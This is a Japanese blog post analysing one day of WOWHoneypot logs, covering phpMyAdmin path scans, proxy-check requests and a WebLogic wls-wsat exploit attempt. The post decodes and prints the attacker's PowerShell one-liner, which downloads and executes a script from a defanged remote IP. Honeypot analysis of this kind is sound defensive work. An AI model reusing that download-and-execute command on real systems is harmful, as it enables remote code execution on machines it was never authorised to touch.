S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypot簡易分析(9日目)

WOWHoneypot簡易分析(9日目)

honeypot

WOWhoneypotの2018/6/12(火)(運用9日目)の簡易分析です。

本日の総アクセス数は186件です。

$ awk '/06-12/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
108 [2018-06-12 "GET /
4 [2018-06-12 "GET /pma/index.php
4 [2018-06-12 "GET /phpmyadmin/index.php
4 [2018-06-12 "GET /mysql/index.php
4 [2018-06-12 "GET /index.php
4 [2018-06-12 "GET /db/index.php
3 [2018-06-12 "HEAD /
3 [2018-06-12 "GET /pmamy2/index.php
2 [2018-06-12 "POST /wls-wsat/CoordinatorPortType
2 [2018-06-12 "GET /pmd/index.php
2 [2018-06-12 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-12 "GET /phpMyAdmin.old/index.php
2 [2018-06-12 "GET /phpmyadmin-old/index.php
2 [2018-06-12 "GET /phpMyAdmin/index.php
2 [2018-06-12 "GET /phpMyadmin_bak/index.php
2 [2018-06-12 "GET /phpmyadmin2/index.php
2 [2018-06-12 "GET /phpmyadmin1/index.php
2 [2018-06-12 "GET /phpma/index.php
2 [2018-06-12 "GET /phpadmin/index.php
2 [2018-06-12 "GET /mysql-admin/index.php
2 [2018-06-12 "GET /myadmin/index.php
2 [2018-06-12 "GET /myadmin2/index.php
2 [2018-06-12 "GET /dbadmin/index.php
2 [2018-06-12 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-12 "GET /admin/PMA/index.php
2 [2018-06-12 "GET /admin/phpmyadmin/index.php
2 [2018-06-12 "GET /admin/mysql/index.php
2 [2018-06-12 "GET /admin/index.php
1 [2018-06-12 "PROPFIND /
1 [2018-06-12 "GET /web/phpMyAdmin/index.php
1 [2018-06-12 "GET /pma-old/index.php
1 [2018-06-12 "GET /PMA/index.php
1 [2018-06-12 "GET /PMA2/index.php
1 [2018-06-12 "GET /phpMyAdmin/phpMyAdmin/index.php
1 [2018-06-12 "GET /phpMyAdminold/index.php
1 [2018-06-12 "GET /phpmyadmin0/index.php
1 [2018-06-12 "GET hxxp://httpheader[.]net/
1 [2018-06-12 "GET hxxp://db.speedup[.]gdn/echo.php
1 [2018-06-12 "GET /favicon.ico
1 [2018-06-12 "GET /admin/mysql2/index.php

ハンティングログは0件でした。

 

アクセスログからPhpMyAdmin関連と思われるindex.phpへのアクセスを除きます。

$ awk '/06-12/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr | grep -v index.php
108 [2018-06-12 "GET /
3 [2018-06-12 "HEAD /
2 [2018-06-12 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-12 "PROPFIND /
1 [2018-06-12 "GET hxxp://httpheader[.]net/
1 [2018-06-12 "GET hxxp://db.speedup[.]gdn/echo.php
1 [2018-06-12 "GET /favicon.ico

毎日のWeblogic脆弱性をつく任意のコード実行の攻撃部分です。 いつもとパターンは同じです。

$ awk '/06-12/{print $1,$5,$6,$10}' access_log | grep wls | awk '{print $4}' | base64 -d | grep -o 'Hidden.*' | awk '{print $3}' | base64 -d
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');base64: invalid input

以下は6/9も来ていたものです。UAから公開プロキシを探すスキャン行為と思われます。

GET hxxp://db.speedup[.]gdn/echo.php HTTP/1.1
User-Agent: PxBroker/0.3.1/5351
Accept: */*
Accept-Encoding: gzip, deflate
Pragma: no-cache
Cache-control: no-cache
Cookie: cookie=ok
Referer: https://www.google.com/
Host: db.speedup.gdn
Connection: close
Content-Length: 0 

以下はどんな攻撃によるものか詳細不明です。

GET hxxp://httpheader[.]net/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
Host: httpheader.net
Accept-Encoding: deflate, gzip
Proxy-Connection: Keep-Alive
Accept-Language: en-gb,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-Control: no-cache

 以上です。